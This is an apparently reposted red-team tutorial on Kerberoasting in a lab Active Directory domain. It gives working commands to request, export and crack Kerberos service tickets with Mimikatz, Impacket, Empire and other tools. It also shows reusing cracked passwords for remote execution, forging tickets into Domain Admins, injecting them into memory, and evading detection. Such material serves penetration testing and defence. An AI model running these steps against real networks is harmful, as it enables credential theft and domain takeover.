The process of cracking Kerberos service tickets and rewriting them in order to gain access to the targeted service is called . This is very common attack in red team engagements since it doesn’t require any interaction with the service as legitimate active directory access can be used to request and export the service ticket which can be cracked offline in order to retrieve the plain-text password of the service. This is because service tickets are encrypted with the hash (NTLM) of the service account so any domain user can dump hashes from services without the need to get a shell into the system that is running the service.

Red Teams usually attempt to crack tickets which have higher possibility to be configured with a weak password. Successful cracking of the ticket will not only give access to the service but sometimes it can lead to full domain compromise as often services might run under the context of an elevated account. These tickets can be identified by considering a number of factors such as:

  • SPNs bind to domain user accounts
  • Password last set
  • Password expiration
  • Last logon

Specifically the Kerberoast attack involves five steps:

  1. SPN Discovery
  2. Request Service Tickets
  3. Export Service Tickets
  4. Crack Service Tickets
  5. Rewrite Service Tickets & RAM Injection

The discovery of services in a network by querying the Active Directory for service principal names has been already covered in the SPN Discovery article.

Request Service Tickets

The easiest method to request the service ticket for a specific SPN is through PowerShell as it has been introduced by Tim Medin during his DerbyCon 4.0 talk.

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80"
Service Ticket Request  - service ticket request - Kerberoast | Penetration Testing Lab

Service Ticket Request

Execution of the klist command will list all the available cached tickets.

klist
Kerberoast - Obtain Cached Tickets with klist  - kerberoast obtain cached tickets with klist - Kerberoast | Penetration Testing Lab

Obtain Cached Tickets with klist

An alternative solution to request service tickets is through Mimikatz by specifying as a target the service principal name.

kerberos::ask /target:PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80
Mimikatz - Request Service Ticket  - mimikatz request service ticket - Kerberoast | Penetration Testing Lab

Mimikatz – Request Service Ticket

Similarly to klist the list of Kerberos tickets that exist in memory can be retrieved through Mimikatz. From an existing PowerShell session, the Invoke-Mimikatz script will output all the tickets.

Invoke-Mimikatz -Command '"kerberos::list"'
Invoke-Mimikatz - List Memory Tickets  - invoke mimikatz list memory tickets - Kerberoast | Penetration Testing Lab

Invoke-Mimikatz – List Memory Tickets

Alternatively loading the Kiwi module will add some additional Mimikatz commands which can performed the same task.

load kiwi
kerberos_ticket_list
Kiwi - Kerberos Ticket List  - kiwi kerberos ticket list - Kerberoast | Penetration Testing Lab

Kiwi – Kerberos Ticket List

Or by executing a custom Kiwi command:

kiwi_cmd kerberos::list
Kiwi - Kerberos Ticket List Command  - kiwi kerberos ticket list command - Kerberoast | Penetration Testing Lab

Kiwi – Kerberos Ticket List Command

Impacket has a python module which can request Kerberos service tickets that belong to domain only which should be easier to cracked compared to computer accounts service tickets. However requires valid domain credentials in order to interact with the Active Directory since it will executed from a system that is not part of a domain.

./GetUserSPNs.py -request pentestlab.local/test
Impacket - Service Ticket Request  - impacket service ticket request - Kerberoast | Penetration Testing Lab

Impacket – Service Ticket Request

The service account hashes will also retrieved in John the Ripper format.

Impacket - Service Hash  - impacket service hash - Kerberoast | Penetration Testing Lab

Impacket – Service Hash

Identification of weak service tickets can be also performed automatically with a PowerShell module that was developed by Matan Hart and is part of RiskySPN. The purpose of this module is to perform an audit on the available service tickets that belong to users in order to find the tickets that are most prone to contain a weak password based on the user account and password expiration.

Find-PotentiallyCrackableAccounts -FullData -Verbose
RiskySPN - Audit Service Tickets  - riskyspn audit service tickets - Kerberoast | Penetration Testing Lab

RiskySPN – Audit Service Tickets

The script will provide more detailed output compare to klist and Mimikatz including the Group information, password age and crack window.

RiskySPN - Ticket Information  - riskyspn ticket information - Kerberoast | Penetration Testing Lab

RiskySPN – Ticket Information

Executing the same module with the domain parameter will return all the user accounts that have an associated service principal name.

Find-PotentiallyCrackableAccounts -Domain "pentestlab.local"
RiskySPN - Service Tickets  - riskyspn service tickets - Kerberoast | Penetration Testing Lab

RiskySPN – Service Tickets

Service ticket information can be also exported in CSV format for offline review.

Export-PotentiallyCrackableAccounts

RiskySPN - CSV Export  - riskyspn csv export - Kerberoast | Penetration Testing Lab

All the ticket information that was appeared in the console will be written into the file.

RiskySPN - Ticket Information CSV  - riskyspn ticket information csv - Kerberoast | Penetration Testing Lab

RiskySPN – Ticket Information CSV

Part of the same repository there is also a script which can obtain a service ticket for a service instance by its SPN.

Get-TGSCipher -SPN "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80"
TGSCipher - Service Ticket Information  - tgscipher service ticket information - Kerberoast | Penetration Testing Lab

TGSCipher – Service Ticket Information

The Kerberoast toolkit by Tim Medin has been re-implemented to automate the process. Auto-Kerberoast contains the original scripts of Tim including  two PowerShell scripts that contain various functions that can be executed to request, list and export service tickets in Base64, John and Hashcat format.

List-UserSPNs
AutoKerberoast - ListUserSPNs  - autokerberoast listuserspns - Kerberoast | Penetration Testing Lab

AutoKerberoast – ListUserSPNs

There is also a domain parameter which can list only the SPNs of a particular domain.

List-UserSPNs -Domain "pentestlab.local"
AutoKerberoast - ListUserSPNs with Domain Parameter  - autokerberoast listuserspns with domain parameter - Kerberoast | Penetration Testing Lab

AutoKerberoast – ListUserSPNs with Domain Parameter

Export Service Tickets

Mimikatz is the standard tool which can export Kerberos service tickets. From a PowerShell session the following command will list all the available  tickets in memory and will save them in the remote host.

Invoke-Mimikatz -Command '"kerberos::list /export"'
Invoke-Mimikatz - Export Service Tickets  - invoke mimikatz export service tickets - Kerberoast | Penetration Testing Lab

Invoke-Mimikatz – Export Service Tickets

Similarly PowerShell Empire has a module which automates the task of Kerberos service ticket extraction.

usemodule credentials/mimikatz/extract_tickets
Empire - Extract Service Tickets Module  - empire extract service tickets module - Kerberoast | Penetration Testing Lab

Empire – Extract Service Tickets Module

The module will use the Invoke-Mimikatz function to execute automatically the commands below.

standard::base64
kerberos::list /export
Empire - Export Service Tickets  - empire export service tickets - Kerberoast | Penetration Testing Lab

Empire – Export Service Tickets

Ticket hashes for services that support Kerberos authentication can extracted directly with a PowerShell Empire module. The format of the hash can be extracted either as John or Hashcat.

usemodule credentials/invoke_kerberoast
Empire - Kerberoast Module  - empire kerberoast module - Kerberoast | Penetration Testing Lab

Empire – Kerberoast Module

The module will retrieve the password hashes for all the service accounts.

Empire - Kerberoast Hash  - empire kerberoast hash - Kerberoast | Penetration Testing Lab

Empire – Kerberoast Hash

The AutoKerberoast PowerShell script will request and extract all the service tickets in base64 format.

Invoke-AutoKerberoast
AutoKerberoast - Invoke-AutoKerberoast Base64  - autokerberoast invoke autokerberoast base64 - Kerberoast | Penetration Testing Lab

AutoKerberoast – Invoke-AutoKerberoast Base64

There is also a script part of the AutoKerberoast repository which will display the extracted tickets in hashcat compatible format.

AutoKerberoast - Service Ticket Hash  - autokerberoast service ticket hash - Kerberoast | Penetration Testing Lab

AutoKerberoast – Service Ticket Hash

Tickets that belong to elevated groups for a particular domain can be also extracted for a more targeted Kerberoasting.

Invoke-AutoKerberoast -GroupName "Domain Admins" -Domain pentestlab.local -HashFormat John
AutoKerberoast - Service Ticket Hashes of Particular Domain and Group  - autokerberoast service ticket hashes of particular domain and group - Kerberoast | Penetration Testing Lab

AutoKerberoast – Service Ticket Hashes of Particular Domain and Group

The Get-TGSCipher PowerShell module that Matan Hart developed can extract the password hash of a service ticket in three different formats: John, Hashcat and Kerberoast. The service principal name of the associated service that the script requires can be retrieved during the SPN discovery process.

Get-TGSCipher -SPN "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80" -Format John
TGSCipher - Service Ticket Hash  - tgscipher service ticket hash - Kerberoast | Penetration Testing Lab

TGSCipher – Service Ticket Hash

The benefit of using Get-TGSCipher function is that eliminates the need of Mimikatz for ticket export which can trigger alerts to the blue team and also obtaining the hash directly reduces the step of converting the ticket to john format.

Crack Service Tickets

The python script tgsrepcrack is part of Tim Medin Kerberoast toolkit and can crack Kerberos tickets by supplying a password list.

python tgsrepcrack.py /root/Desktop/passwords.txt PENTESTLAB_001.kirbi
Kerberoast - Crack Service Ticket  - kerberoast crack service ticket - Kerberoast | Penetration Testing Lab

Kerberoast – Crack Service Ticket

Lee Christensen developed extractServiceTicketParts python script which can extract the hash of a service ticket and tgscrack in Go language which can crack the hash.

python extractServiceTicketParts.py PENTESTLAB_001.kirbi
tgscrack - Extract the Hash from Service Ticket  - tgscrack extract the hash from service ticket - Kerberoast | Penetration Testing Lab

tgscrack – Extract the Hash from Service Ticket

The binary requires the hashfile and wordlist local paths.

tgscrack.exe -hashfile hash.txt -wordlist passwords.txt
tgscrack - Cracking the Service Hash  - tgscrack cracking the service hash - Kerberoast | Penetration Testing Lab

tgscrack – Cracking the Service Hash

The password will appear in plain-text.

If PowerShell remoting is enabled then the password that has been retrieved from the service ticket can be used for execution of remote commands and for other lateral movement operations.

Enable-PSRemoting
$pass = 'Password123' | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList 'PENTESTLAB_001', $pass
Invoke-Command -ScriptBlock {get-process} -ComputerName WIN-PTELU2U07KG.PENTESTLAB.LOCAL -Credential $creds
Kerberoast - Command Execution  - kerberoast command execution - Kerberoast | Penetration Testing Lab

Kerberoast – Command Execution

The list of running processes will be retrieved:

Kerberoast - List of Processes  - kerberoast list of processes - Kerberoast | Penetration Testing Lab

Kerberoast – List of Processes

Rewrite Service Tickets & RAM Injection

Kerberos tickets are signed with the NTLM hash of the password. If the ticket hash has been cracked then it is possible to  rewrite the ticket with Kerberoast python script. This tactic will allow to impersonate any domain user or a fake account when the service is going to be accessed. Additionally privilege escalation is also possible as the user can be added into an elevated group such as Domain Admins.

python kerberoast.py -p Password123 -r PENTESTLAB_001.kirbi -w PENTESTLAB.kirbi -u 00
python kerberoast.py -p Password123 -r PENTESTLAB_001.kirbi -w PENTESTLAB.kirbi -g 12
Kerberoast - Rewrite Service Tickets  - kerberoast rewrite service tickets - Kerberoast | Penetration Testing Lab

Kerberoast – Rewrite Service Tickets

The new ticket can be injected back into the memory with the following Mimikatz command in order to perform authentication with the targeted service via Kerberos protocol.

kerberos::ptt PENTESTLAB.kirbi

Resources





Source link

LEAVE A REPLY

Please enter your comment!
Please enter your name here